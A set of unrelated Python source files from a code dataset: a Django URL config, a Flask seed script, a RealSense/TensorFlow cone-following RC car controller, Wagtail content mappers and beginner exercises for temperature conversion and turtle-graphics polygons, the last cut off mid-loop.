urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\n\n\n#from core import views\n\nurlpatterns = [\n # Paths del Core en core/urls.py (La hemos creado para organizar mejor)\n path('', include('core.urls')), #esto esta en la documentacion de arriba\n\n # Paths del services en services/urls.py (La hemos creado para organizar mejor)\n path('services/', include('services.urls')), #esto esta en la documentacion de arriba\n\n # Paths del blog en blog/urls.py (La hemos creado para organizar mejor)\n path('blog/', include('blog.urls')), #esto esta en la documentacion de arriba\n\n # Paths del pages en pages/urls.py (La hemos creado para organizar mejor)\n path('page/', include('pages.urls')), #esto esta en la documentacion de arriba\n\n\n # Paths del contact en contact/urls.py (La hemos creado para organizar mejor)\n path('contact/', include('contact.urls')), #esto esta en la documentacion de arriba\n\n #Path del admin\n path('admin/', admin.site.urls), \n]\n\n# Para acceder a los media en DESARROLLO: Si La variable DEBUG esta TRUE (en DE S)\nif settings.DEBUG:\n from django.conf.urls.static import static #permite servir ficheros estaticos\n\n # tenemos que decirle a los urlpatterns que les sirva los ficheros solicitados. Busca en MEDIA_ROOT y los sirve en MEDIA_URL\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) \n","sub_path":"webempresa/webempresa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327980060","text":"#!/usr/bin/env python\n\nfrom configparser import ConfigParser\nimport bot_constants\nimport os\nimport logging\n\n\nclass BotfriendData:\n \"\"\"\n This is Botfriend's knowledge store.\n Constants and static method data related to\n responding or processing go here. 
Provides data for the API calls\n\n \"\"\"\n def __init__(self):\n\n # Clean this up\n\n c = ConfigParser()\n bc = bot_constants.BotConstants()\n self.config = c.read('botfriend.conf')\n self.config_file = 'botfriend.conf'\n self.greeting_keywords = bc.GREETING_KEYWORDS\n self.greeting_responses = bc.GREETING_RESPONSES\n self.monikers = bc.MONIKERS\n self.saved_user_data = c.read('savedUserData.conf')\n self.saved_user_data_file = 'savedUserData.conf'\n\n def writeConfig(self):\n if os.path.isfile(self.config_file):\n os.rename(self.config_file, self.config_file+ \".bak\")\n logging.info(\"Writing to ConfigFile with new data\")\n with open(self.config_file, 'w') as configFile:\n self.config.write(configFile)\n\n\nclass Botfriend:\n\n # Main botfriend class\n\n def __init__(self, BotfriendData):\n\n self.BotfriendData = BotfriendData\n","sub_path":"botfriend_api.py","file_name":"botfriend_api.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616148428","text":"# -*- coding: utf-8 -*-\nfrom app import db, models\n\nmodels.User.query.delete()\nmodels.Question.query.delete()\nmodels.Answer.query.delete()\n\nu1 = models.User('Tom', 'user1@email.com', '0000')\nu2 = models.User('Siri', 'user2@email.com', '0000')\ndb.session.add(u1)\ndb.session.add(u2)\n\nq1 = models.Question('How many years are you programming?', u1)\nq2 = models.Question('Django or flask?', u2)\ndb.session.add(q1)\ndb.session.add(q2)\ndb.session.commit()","sub_path":"addrow.py","file_name":"addrow.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437740495","text":"import pyrealsense2.pyrealsense2 as rs\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nimport math\n\nimport os\nimport serial\nimport threading as t\nimport time\n\nfrom utils import cv_utils\nfrom utils import operations as ops\nfrom 
utils import tf_utils\n\nser = serial.Serial('/dev/ttyACM0', 19200, timeout=0.3)\nstrInput = \"show ver\"\nser.flush()\nser.write(strInput.encode('utf-8')+b'\\n')\n\n\nCAR_STATE = [\"CLOCK\",\"STRAIGHT\"]\n\n\nFRAME_WIDTH = 1280\nFRAME_HEIGHT = 720\n\nOFFSET = 450\n\n\nDETECT_MIN = (int(FRAME_WIDTH/2)-OFFSET, 0)\nDETECT_MAX = (int(FRAME_WIDTH/2)+OFFSET, FRAME_HEIGHT)\n\n\nLEFT_START_POINT = (int(FRAME_WIDTH/2)-OFFSET, 0) \nLEFT_END_POINT = (int(FRAME_WIDTH/2)-OFFSET, FRAME_HEIGHT)\n\nRIGHT_START_POINT = (int(FRAME_WIDTH/2)+OFFSET, 0) \nRIGHT_END_POINT = (int(FRAME_WIDTH/2)+OFFSET, FRAME_HEIGHT)\n\nLINE_COLOR = (0, 0, 255) \n\nLINE_THICKNESS = 5\n\nSCORE_THRESHOLD = 0.5\nNON_MAX_SUPPRESSION_THRESHOLD = 0.5\n\nOVERRIDE = True\n# Configure depth front\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_device('035422073295')\nconfig.enable_stream(rs.stream.color, FRAME_WIDTH, FRAME_HEIGHT, rs.format.bgr8, 30)\nconfig.enable_stream(rs.stream.depth, FRAME_WIDTH, FRAME_HEIGHT, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.infrared,1, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\nconfig.enable_stream(rs.stream.infrared,2, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\n\n\n# configure depth back\npipeline_back = rs.pipeline()\nconfig_back = rs.config()\nconfig_back.enable_device('034422074343')\nconfig_back.enable_stream(rs.stream.color, FRAME_WIDTH, FRAME_HEIGHT, rs.format.bgr8, 30)\nconfig_back.enable_stream(rs.stream.depth, FRAME_WIDTH, FRAME_HEIGHT, rs.format.z16, 30)\nconfig_back.enable_stream(rs.stream.infrared,1, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\nconfig_back.enable_stream(rs.stream.infrared,2, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\n\n\nprint(\"[INFO] Starting streaming...\")\nprofile = pipeline.start(config)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nprofile_back = pipeline_back.start(config_back)\ndepth_sensor_back = 
profile_back.get_device().first_depth_sensor()\ndepth_scale = depth_sensor_back.get_depth_scale()\n\nprint(\"[INFO] Camera ready.\")\n\n# download model from: https://github.com/opencv/opencv/wiki/TensorFlow-Object-Detection-API#run-network-in-opencv\nprint(\"[INFO] Loading model...\")\nCONE_CKPT = \"./frozen_inference_graph.pb\"\nRCNN_CKPT = \"./ssd_mobilenet_v2_coco_2018_03_29/frozen_inference_graph.pb\"\n\n# Load the Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(CONE_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.compat.v1.import_graph_def(od_graph_def, name='')\n sess = tf.compat.v1.Session(graph=detection_graph)\n\nrcnn_graph = tf.Graph()\nwith rcnn_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(RCNN_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.compat.v1.import_graph_def(od_graph_def, name='')\n session_rcnn = tf.compat.v1.Session(graph=rcnn_graph)\n\n# coordinate distance\ndef distance(x1, x2, y1, y2):\n return math.sqrt( ((x1-x2)**2)+((y1-y2)**2) )\n\n# RC params\nSPEED = 0\nDIRECTION= 30\nMID_ANGLE = 30\nMAX_SPEED = 100\nMIN_SPEED = 5\n\ndetection_graph = tf_utils.load_model(CONE_CKPT)\nrcnn_graph = tf_utils.load_model(RCNN_CKPT)\n\n# camera\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, FRAME_WIDTH)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, FRAME_HEIGHT)\n\nhasStarted = False\n# input to arduino \ndef writeArduiono():\n while True:\n if hasStarted:\n if DIRECTION == 0 or DIRECTION == 90:\n ACTION = (str(DIRECTION)+\"#\" +str(SPEED)+ \"\\n\").encode('utf_8')\n ser.write(ACTION)\n line = ser.readline().decode('utf-8').rstrip()\t\n print(line)\n time.sleep(0.2)\n else:\n ACTION = (str(DIRECTION)+\"#\" +str(SPEED)+ \"\\n\").encode('utf_8')\n ser.write(ACTION)\n line = 
ser.readline().decode('utf-8').rstrip()\t\n print(line)\n print(\"Has started\")\n\n# start motor thread for individual process\nmotorThread = t.Thread(target = writeArduiono)\nmotorThread.start()\n\n# get the middle of 2 boudries\ndef mid_from_boundries_clock(left_cone, right_cone):\n if left_cone is None:\n left_cone = ((0,FRAME_HEIGHT/2), None)\n \n if right_cone is None:\n right_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None)\n\n if left_cone is not None and left_cone[1] is not None and left_cone[1] ==\"ORANGE\":\n if right_cone[1] is None or (right_cone[1] is not None and right_cone[1] ==\"ORANGE\"):\n right_cone = ((0, FRAME_HEIGHT/2), None)\n else:\n left_cone = ((0,FRAME_HEIGHT/2), None)\n \n if right_cone[1] is not None and right_cone[1] ==\"GREEN\":\n if left_cone[1] is None or (left_cone[1] is not None and left_cone[1] ==\"GREEN\"):\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None)\n else:\n right_cone = ((FRAME_WIDTH,FRAME_HEIGHT/2), None)\n # middle of two objects\n _mid = (left_cone[0][0]+right_cone[0][0])/2\n return _mid\n\ndef mid_from_boundries_anti_clock(left_cone, right_cone):\n if left_cone is None:\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n \n if right_cone is None:\n right_cone = ((0,FRAME_HEIGHT/2), None)\n\n if left_cone[1] is not None and left_cone[1] ==\"ORANGE\":\n if right_cone[1] is None or (right_cone[1] is not None and right_cone[1] ==\"ORANGE\"):\n right_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n else:\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n \n if right_cone[1] is not None and right_cone[1] ==\"GREEN\":\n if left_cone[1] is None or (left_cone[1] is not None and left_cone[1] ==\"GREEN\"):\n left_cone = ((0,FRAME_HEIGHT/2), None)\n else:\n right_cone = ((0,FRAME_HEIGHT/2), None)\n # middle of two objects\n _mid = (left_cone[0][0]+right_cone[0][0])/2\n return _mid\n\n# Input tensor is the image\nimage_tensor = rcnn_graph.get_tensor_by_name('image_tensor:0')\n# Output tensors are the detection boxes, 
scores, and classes\n# Each box represents a part of the image where a particular object was detected\ndetection_boxes = rcnn_graph.get_tensor_by_name('detection_boxes:0')\n# Each score represents level of confidence for each of the objects.\n# The score is shown on the result image, together with the class label.\ndetection_scores = rcnn_graph.get_tensor_by_name('detection_scores:0')\ndetection_classes = rcnn_graph.get_tensor_by_name('detection_classes:0')\n# Number of objects detected\nnum_detections = rcnn_graph.get_tensor_by_name('num_detections:0')\n# code source of tensorflow model loading: https://www.geeksforgeeks.org/ml-training-image-classifier-using-tensorflow-object-detection-api/\nprint(\"[INFO] Model loaded.\")\ncolors_hash = {}\nclasses_90 = [\"background\", \"person\", \"bicycle\", \"car\", \"motorcycle\",\n \"airplane\", \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\", \"fire hydrant\",\n \"unknown\", \"stop sign\", \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\",\n \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"unknown\", \"backpack\",\n \"umbrella\", \"unknown\", \"unknown\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\",\n \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\", \"baseball glove\", \"skateboard\",\n \"surfboard\", \"tennis racket\", \"bottle\", \"unknown\", \"wine glass\", \"cup\", \"fork\", \"knife\",\n \"spoon\", \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hot dog\",\n \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\", \"bed\", \"unknown\", \"dining table\",\n \"unknown\", \"unknown\", \"toilet\", \"unknown\", \"tv\", \"laptop\", \"mouse\", \"remote\", \"keyboard\",\n \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\", \"unknown\",\n \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\", \"cone\" ] \n\ndef convert_image(i):\n m = 
np.min(i)\n M = np.max(i)\n i = np.divide(i, np.array([M - m], dtype=np.float)).astype(np.float)\n i = (i - m).astype(np.float)\n i8 = (i * 255.0).astype(np.uint8)\n if i8.ndim == 3:\n i8 = cv2.cvtColor(i8, cv2.COLOR_BGRA2GRAY)\n i8 = cv2.equalizeHist(i8)\n colorized = cv2.applyColorMap(i8, cv2.COLORMAP_JET)\n colorized[i8 == int(m)] = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n m = float(\"{:.2f}\".format(m))\n M = float(\"{:.2f}\".format(M))\n return colorized\n\ncap = cv2.VideoCapture(6)\nwith tf.Session(graph=detection_graph) as sess,tf.Session(graph=rcnn_graph) as session_rcnn:\n while True:\n\n _, camera = cap.read()\n hasStarted = True\n if CAR_STATE[1] == \"STRAIGHT\":\n frames = pipeline.wait_for_frames()\n else:\n frames = pipeline_back.wait_for_frames()\n # color_frame = frames.get_color_frame()\n frame = frames.get_color_frame()\n depth_frame = frames.get_depth_frame()\n\n ir_frame_1 = frames.get_infrared_frame(1)\n ir_frame_2 = frames.get_infrared_frame(2)\n ir_frame_both = frames.get_infrared_frame()\n \n # Convert images to numpy arrays\n color_image = np.asanyarray(frame.get_data())\n\n # Convert images to numpy arrays\n\n ir_image_both = np.asanyarray(ir_frame_both.get_data())\n ir_image_both = convert_image(ir_image_both)\n\n\n ir_image_1 = np.asanyarray(ir_frame_1.get_data())\n ir_image_1 = cv2.applyColorMap(cv2.convertScaleAbs(ir_image_1, alpha=1), cv2.COLOR_BGRA2GRAY)\n\n ir_image_2 = np.asanyarray(ir_frame_2.get_data())\n ir_image_2 = cv2.applyColorMap(cv2.convertScaleAbs(ir_image_2, alpha=1), cv2.COLOR_BGRA2GRAY)\n\n\n depth_image = np.asanyarray(depth_frame.get_data())\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.02), cv2.COLORMAP_JET)\n\n scaled_size = (frame.width, frame.height)\n # expand image dimensions to have shape: [1, None, None, 3]\n # i.e. 
a single-column array, where each item in the column has the pixel RGB value\n image_expanded = np.expand_dims(camera, axis=0)\n\n frame = np.asanyarray(frame.get_data())\n\n with session_rcnn.as_default():\n # Perform the actual detection by running the model with the image as input\n (boxes, scores, classes, num) = session_rcnn.run([detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_expanded})\n \n boxes = np.squeeze(boxes)\n classes = np.squeeze(classes).astype(np.int32)\n scores = np.squeeze(scores)\n for idx in range(int(num)):\n class_ = classes[idx]\n score = scores[idx]\n box = boxes[idx]\n\n # print(class_,classes_90[class_])\n if class_ not in colors_hash:\n colors_hash[class_] = tuple(np.random.choice(range(256), size=3))\n\n if score > 0.7 and class_ == 1:\n left = int(box[1] * FRAME_WIDTH)\n top = int(box[0] * FRAME_HEIGHT)\n right = int(box[3] * FRAME_WIDTH)\n bottom = int(box[2] * FRAME_HEIGHT)\n\n r,g,b = cv_utils.predominant_rgb_color_object(\n depth_colormap, top, left, bottom, right)\n \n\n p1 = (left, top)\n p2 = (right, bottom)\n # r, g, b = colors_hash[class_]\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, classes_90[class_], p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (255,0,0), 2, cv2.LINE_AA) \n\n with detection_graph.as_default():\n crops, crops_coordinates = ops.extract_crops(\n frame, FRAME_HEIGHT, FRAME_WIDTH,\n FRAME_HEIGHT-20, FRAME_HEIGHT-20)\n \n detection_dict = tf_utils.run_inference_for_batch(crops, sess)\n\n # The detection boxes obtained are relative to each crop. Get\n # boxes relative to the original image\n # IMPORTANT! 
The boxes coordinates are in the following order:\n # (ymin, xmin, ymax, xmax)\n boxes = []\n for box_absolute, boxes_relative in zip(\n crops_coordinates, detection_dict['detection_boxes']):\n boxes.extend(ops.get_absolute_boxes(\n box_absolute,\n boxes_relative[np.any(boxes_relative, axis=1)]))\n if boxes:\n boxes = np.vstack(boxes)\n\n # Remove overlapping boxes\n boxes = ops.non_max_suppression_fast(\n boxes, NON_MAX_SUPPRESSION_THRESHOLD)\n\n # Get scores to display them on top of each detection\n boxes_scores = detection_dict['detection_scores']\n boxes_scores = boxes_scores[np.nonzero(boxes_scores)]\n detected = False\n hasLeft = False\n hasRight = False\n\n right_cone = None\n left_cone = None\n \n for box, score in zip(boxes, boxes_scores):\n if score > 0.1:\n left = int(box[1])\n top = int(box[0])\n right = int(box[3])\n bottom = int(box[2])\n\n # center of object\n avg_x = (left+right)/2\n avg_y = (top+bottom)/2\n\n # find the area of the object box\n width = distance(left, right, top, bottom)\n height = distance(left, right, top, bottom) \n area = int((width * height)/100)\n\n # motor control only if area of the object is in between two values\n if CAR_STATE[1] == \"STRAIGHT\":\n min_a = 300\n max_a = 1000\n else:\n min_a = 100\n max_a = 900\n\n if(area > min_a and area < max_a):\n p1 = (left, top)\n p2 = (right, bottom)\n\n r,g,b = cv_utils.predominant_rgb_color(\n frame, top, left, bottom, right)\n _color = None\n if(g > 200):\n _color =\"GREEN\"\n else:\n _color = \"ORANGE\"\n\n if((avg_x > LEFT_START_POINT[0] and avg_x < RIGHT_START_POINT[0]) \n or (avg_y > LEFT_START_POINT[1] and avg_y < RIGHT_START_POINT[1]) ):\n detected = True\n\n if(avg_x < (FRAME_WIDTH/2)):\n cone = \"LEFT\"\n else:\n cone = \"RIGHT\"\n\n if(cone == \"LEFT\" and _color == \"GREEN\"):\n if(hasLeft):\n pass\n else:\n hasLeft = True\n left_cone = (((right+right)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, 
f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n if(cone == \"RIGHT\" and _color == \"ORANGE\"):\n if(hasRight):\n pass\n else:\n hasRight = True\n right_cone = (((right+right)/2, (top+bottom)/2), _color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n \n if(cone==\"LEFT\" and hasLeft == False and _color == \"ORANGE\"):\n hasLeft = True\n left_cone = (((right+right)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n if(cone==\"RIGHT\" and hasRight == False and _color == \"GREEN\"):\n hasRight = True\n right_cone = (((left+left)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n CENTER_X = (int(FRAME_WIDTH/2))\n if CAR_STATE[0] == \"CLOCK\":\n # middle of two objects\n _mid = mid_from_boundries_clock(left_cone, right_cone)\n elif CAR_STATE[0] == \"ANTI-CLOCK\":\n _mid = mid_from_boundries_anti_clock(left_cone, right_cone)\n\n if(OVERRIDE == False):\n ## alpha stage of motor and speed control\n # if((_mid < CENTER_X and _mid > LEFT_START_POINT[0])): \n # DIRECTION = np.interp(_mid,[320,510],[30,60])\n # # DIRECTION = 60\n # elif((_mid > CENTER_X and _mid < RIGHT_START_POINT[0]) or left_cone[1] == \"ORANGE\"):\n # DIRECTION = np.interp(_mid,[125,320],[0,30])\n # else:\n # DIRECTION = 30\n # SPEED = 10\n\n # dynamic direction and speed of motor\n DIRECTION = int(np.interp(_mid,[LEFT_START_POINT[0],RIGHT_START_POINT[0]],[60,0]))\n # middle angle is 30\n diff_angle = abs(DIRECTION-MID_ANGLE)\n\n if (CAR_STATE[1] == \"STRAIGHT\"):\n SPEED = int(np.interp(diff_angle, [0, MID_ANGLE],[MAX_SPEED, MIN_SPEED]))\n elif(CAR_STATE[1] 
==\"REVERSE\"):\n SPEED = -int(np.interp(diff_angle, [0, MID_ANGLE],[MAX_SPEED, MIN_SPEED]))\n else:\n SPEED = 0\n DIRECTION = 30\n\n if(detected):\n LINE_COLOR = (0,0,255)\n else:\n LINE_COLOR = (0,255,0)\n # print(LINE_COLOR)\n cv2.circle(frame, (int(FRAME_WIDTH/2), int(FRAME_HEIGHT/2)), 20, (255,255,0), 2)\n cv2.line(frame, LEFT_START_POINT, LEFT_END_POINT, LINE_COLOR, LINE_THICKNESS) \n cv2.line(frame, RIGHT_START_POINT, RIGHT_END_POINT, LINE_COLOR, LINE_THICKNESS) \n \n # debugging text\n cv2.putText(frame,f\"Overide State: {OVERRIDE}\", (int(FRAME_WIDTH/1.3)-20,int(FRAME_HEIGHT/2)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"Detected: {detected}\", (int(FRAME_WIDTH/1.3)-20, int(FRAME_HEIGHT/2)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n \n cv2.putText(frame,f\"Left Cone: {left_cone}\", (10,int(FRAME_HEIGHT/2)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"Right Cone: {right_cone}\", (10,int(FRAME_HEIGHT/2)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n\n cv2.putText(frame,f\"Face: {CAR_STATE[0]}\", (10,int(FRAME_HEIGHT)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"DRIVE: {CAR_STATE[1]}\", (10,int(FRAME_HEIGHT)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n\n\n cv2.putText(frame,f\"SPEED: {SPEED}\", (FRAME_WIDTH-250, FRAME_HEIGHT-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"DIRECTION: {DIRECTION}\", (FRAME_WIDTH-250,FRAME_HEIGHT-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n try:\n cv2.putText(frame,f\"MID: {_mid}\", (FRAME_WIDTH-250,FRAME_HEIGHT-100), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA) \n cv2.line(frame, (int(_mid), 0), (int(_mid), FRAME_HEIGHT), (100,200,200), LINE_THICKNESS) \n except:\n continue\n \n\n t = cv2.waitKey(1)\n\n frame_final = frame.copy()\n\n # overlay shit here\n overlay_aspect = [int(FRAME_HEIGHT*0.2), 
int(FRAME_WIDTH*0.2)]\n w_overlay_start = 100\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(depth_colormap, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_1, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_2, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_both, (overlay_aspect[1], overlay_aspect[0]))\n\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', frame_final)\n cv2.imshow(\"IR\",cv2.applyColorMap(cv2.convertScaleAbs(depth_colormap, alpha=0.02), cv2.COLORMAP_JET))\n # cv2.imshow('Depth', depth_colormap)\n\n if t == ord('q'):\n break\n \n if t == ord('i'):\n CAR_STATE[1]=\"STRAIGHT\"\n elif t == ord('k'):\n CAR_STATE[1] = \"REVERSE\"\n\n if t == ord('j'):\n CAR_STATE[0]=\"CLOCK\"\n elif t == ord('l'):\n CAR_STATE[0] = \"ANTI-CLOCK\"\n\n if t == ord('s'):\n if OVERRIDE == False:\n OVERRIDE = True\n SPEED = 0\n print(\"Overide ON\")\n else:\n SPEED = int(np.interp(30, [0, MID_ANGLE],[MAX_SPEED,MIN_SPEED]))\n OVERRIDE = False\n print(\"Overdie OFF\")\n\n\nhasStarted = False\n\nprint(\"[INFO] stop streaming ...\")\ncap.release()\ncv2.destroyAllWindows()\nprint(\"[INFO] closing thread ...\")\nraise SystemExit\n","sub_path":"CONE_DUMP/camera/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":23016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193035386","text":"#Write a Python program to convert temperatures to and from celsius,Fahrenheit\r\n\r\n\r\ndef 
CELCIUS_FARENHEIT ():\r\n valorCelsius = int ( input ( \"Por favor ingrese el valor en celsius: \" ))\r\n\r\n valorFahrenheit = ( valorCelsius * 1.8 ) + 32\r\n\r\n print( f'El valor en Fahrenheit es: { valorFahrenheit } ' )\r\n\r\nresultado = CELCIUS_FARENHEIT()\r\n\r\n\r\n\r\n","sub_path":"Ejercicio_25/Celsius_Fahrenheit.py","file_name":"Celsius_Fahrenheit.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507223605","text":"from wagtail_content_import.mappers.streamfield import StreamFieldMapper\nfrom wagtail_content_import.mappers.converters import RichTextConverter, ImageConverter, TableConverter, TextConverter, BaseConverter\n\n\nclass SimpleMapper(StreamFieldMapper):\n html = RichTextConverter('paragraph')\n image = ImageConverter('image')\n heading = TextConverter('heading')\n table = TableConverter('table')\n\n\nclass HeadingBlockConverter(BaseConverter):\n def __call__(self, element, **kwargs):\n return (self.block_name, {'heading_text': element['value'], 'size': 'h2'})\n\nclass ImageBlockConverter(BaseConverter):\n def __call__(self, element, **kwargs):\n file_name, content = ImageConverter.fetch_image(element['value'])\n image = ImageConverter.import_as_image_model(file_name, content, kwargs['user'])\n return (self.block_name, {'image': image})\n\nclass BaseBlockMapper(StreamFieldMapper):\n html = RichTextConverter('paragraph_block')\n image = ImageBlockConverter('image_block')\n heading = HeadingBlockConverter('heading_block')\n table = TableConverter('table_block')\n","sub_path":"bakerydemo/base/mappers.py","file_name":"mappers.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192717314","text":"'''\nAuthor: Cody Deeran\nDate: Feburary 7. 
2017\nClass: ISTA 130\nSection Leader: Hanna Smith\n\nDescription:\nThis program draw multiple shapes using turtle graphics\n'''\n\nimport turtle\n\ndef polygon(turtle, sides, length):\n '''\n This function will draw a polygon. What kind will\n be determined by the number of sides.\n\n Parameters:\n turtle - A turtle object that will be used to draw\n the polygon.\n sides - The number of sides the polygon will have.\n length - The length of each side.\n\n Returns: None\n '''\n angle = 360 / sides\n for i in range(sides):\n turtle.forward(length)\n turtle.left(angle)\n\n return None\n\n#==========================================================\ndef main():\n '''\n This will define different turtle objects that will be\n used to draw polygons. Each turtle object will call the\n function polygon to draw thier repective shape.\n '''\n # Have the people change these numbers.\n size = 50\n separate = 20\n numOfShapes = 5\n pentSides = 5\n triSides = 7\n sqrSides = 9\n color = 'blue'\n color1 = 'green'\n color2 = 'purple'\n\n # Define the turtle to draw the pentagons\n pent = turtle.Turtle()\n pent.speed(0)\n pent.penup()\n pent.pensize(5)\n pent.forward(size)\n pent.seth(180)\n\n # Draw the pentagons\n for i in range(numOfShapes):\n pent.pencolor(color)\n pent.pendown()\n polygon(pent, pentSides, size)\n pent.penup()\n pent.seth(270)\n pent.forward(separate)\n pent.seth(180)\n\n # Define the turtle to draw the triangles\n tri = turtle.Turtle()\n tri.speed(0)\n tri.penup()\n tri.pensize(5)\n tri.seth(60)\n\n # Draw the triangles\n for i in range(numOfShapes):\n tri.pencolor(color1)\n tri.pendown()\n polygon(tri, triSides, size)\n tri.penup()\n tri.seth(150)\n tri.forward(separate)\n tri.seth(60)\n\n # Define the turtle to draw the squares\n sqr = turtle.Turtle()\n sqr.speed(0)\n sqr.penup()\n sqr.pensize(5)\n sqr.forward(size)\n sqr.seth(30)\n\n # Draw the squares\n for i in range(numOfShapes):\n sqr.pencolor(color2)\n sqr.pendown()\n polygon(sqr, sqrSides, size)\n 
